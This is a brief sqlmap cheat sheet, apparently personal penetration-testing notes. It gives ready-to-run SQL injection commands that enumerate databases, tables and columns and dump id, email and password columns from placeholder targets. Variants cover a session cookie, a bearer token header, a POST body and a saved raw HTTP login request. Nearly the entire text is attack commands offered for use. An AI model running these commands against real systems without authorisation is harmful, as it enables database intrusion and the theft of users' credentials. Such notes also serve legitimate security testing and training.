
Sqlmap

basic (enumerate databases, then tables, then columns, then dump selected columns)

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} -T {TABLE-NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} -T {TABLE-NAME} -C id,email,password --dump
with cookie
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs
with header
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs
POST (form body passed with --data)
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop --tables
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -T users --dump
from file login.request (raw HTTP request saved to a file, passed with -r)
POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1

email=admin&password=admin
sqlmap -r login.request --batch
sqlmap -r login.request -p email
sqlmap -r login.request -p password